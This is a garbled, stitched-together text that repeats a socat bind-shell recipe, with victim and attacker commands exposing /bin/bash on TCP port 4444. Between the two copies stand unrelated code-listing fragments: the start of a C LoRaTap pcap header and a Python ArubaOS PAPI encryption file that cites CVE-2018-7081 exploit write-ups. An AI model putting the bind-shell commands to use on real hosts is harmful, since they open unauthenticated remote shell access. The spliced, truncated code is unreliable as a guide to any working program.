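socat bind shell (plain TCP listener on port 4444: no authentication or encryption, so any host that can reach the port gets the shell)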
Victim
socat exec:"/bin/bash -li",pty,stderr,setsid,sigint,sane tcp-listen:4444
Attacker
socat -,raw,echo=0 tcp:127.0.0.1:4444
| #include "loratap.h" | |
| #include <string.h> | |
| #include <stdio.h> | |
| #include <arpa/inet.h> | |
| #define LINKTYPE_LORA_LORATAP 270 /* pcap LINKTYPE_ value for LoRaTap-encapsulated LoRa frames */ | |
| typedef struct pcap_hdr_s { | |
| uint32_t magic_number; /* magic number */ | |
| uint16_t version_major; /* major version number */ |
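socat bind shell (plain TCP listener on port 4444: no authentication or encryption, so any host that can reach the port gets the shell)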
Victim
socat exec:"/bin/bash -li",pty,stderr,setsid,sigint,sane tcp-listen:4444
Attacker
socat -,raw,echo=0 tcp:127.0.0.1:4444
| import hashlib | |
| from struct import * | |
| """ | |
| This implementation was reverse engineered using Wireshark (and source code), strace and two excellent articles: | |
| - https://x-c3ll.github.io/posts/CVE-2018-7081-RCE-ArubaOS/ | |
| - https://packetstormsecurity.com/files/136997/Aruba-Authentication-Bypass-Insecure-Transport-Tons-Of-Issues.html | |
| """ | |
| def papi_encrypt(data): |